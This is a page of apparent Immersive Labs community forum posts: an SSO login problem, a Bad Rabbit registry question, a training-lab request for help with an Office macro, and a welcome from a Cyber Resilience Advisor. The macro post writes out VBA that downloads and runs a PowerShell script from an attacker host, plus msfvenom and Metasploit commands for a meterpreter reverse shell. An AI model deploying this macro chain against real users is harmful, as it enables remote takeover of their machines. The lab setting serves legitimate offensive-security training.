Strangeness with SSO?
Hey, Is anyone else having weird issues with authentication when trying to be logged into both the main Immersive Labs platform, and this Community site in the same browser at the same time? If I load the Community site first, it mostly seems to play nice. But if I've got IL open in another tab, and come here, it seems to get stuck in weird authentication loops, where I log in, stick my creds in (for customer/EU), then get redirected back to the site to find it is still saying "Sign In" in the top right corner. I also could just see a load of discussions about one of the FIN7 labs when I wasn't logged in - but now that I'm logged in, I can't find the thread at all. Perhaps I should stop using MS Edge? ;-p Cheers, Steve.82Views2likes7CommentsRansomware: Bad Rabbit - Registry key
Hi the question is:What is the full registry key path which gets registered in regard to the "cscc" service? The obvious answer is: HKLM\System\CurrentControlSet\Services\cscc You find it it on the analyst vm in splunk, on the malware vm. But that's not accepted. If anybody knows what is actually expected?Solved15Views1like4CommentsWeaponization: Payloads – Office Macros
I've been banging my head against this brick wall for a few hours now and I could use a second set of eyes. 1. I've created a macro enabled word doc with the following vb code on windows machine: Sub Document_Open() Dim ps as String ps = "powershell.exe -NoExit Invoke-Expression (New-Object Net.WebClient).DownloadString('http://MY_KALI_IP/shell.ps1')" process = Shell(ps, vbhide) End Sub 2. python3 -m http.server to start server to serve shell.ps1 on request 3. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f psh > shell.ps1 to create reverse shell with same name the command in the macro script will go looking for 4. create listener with sudo msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST KALI IP, set LPORT 443 then exploit to start listener 5. back on windows machine, go to target_ip:8888, browse to macro doc, submit and execute. What am I missing?69Views1like2CommentsCyber Resilience Advisors
Welcome to your community. Here, you can converse and ask questions to expand your knowledge of cyber and get the most out of the platform. The title of this post is "Cyber Resilience Advisors." So, what are they, and how do they help? A Cyber Resilience Advisor is a professional who guides organizations in developing and managing their cybersecurity workforce. They may assist with strategy development, talent acquisition, career development, performance management, and training for cybersecurity roles. Their ultimate goal is to ensure the organization has a highly skilled, competent, and effective cybersecurity team to protect against and respond to cyber threats. So, what am I telling you this? Immersive Labs has a multitude of SMEs across a broad spectrum of skills and professions with whom you can interact and ask questions as part of the community. I am a Cyber Resilience Advisor and part of the Cyber Resilience Team. We are on here as well. It is a cliche, but in cyber, we really are in this together; we gain security through knowledge, and here is the perfect vehicle to gain that in conjunction with the platform. I look forward to joining you all in the community and helping make your cybersecurity visions a reality, regardless of your skill sets and experience. As a community, we can accomplish anything. Clem Craven52Views7likes0Comments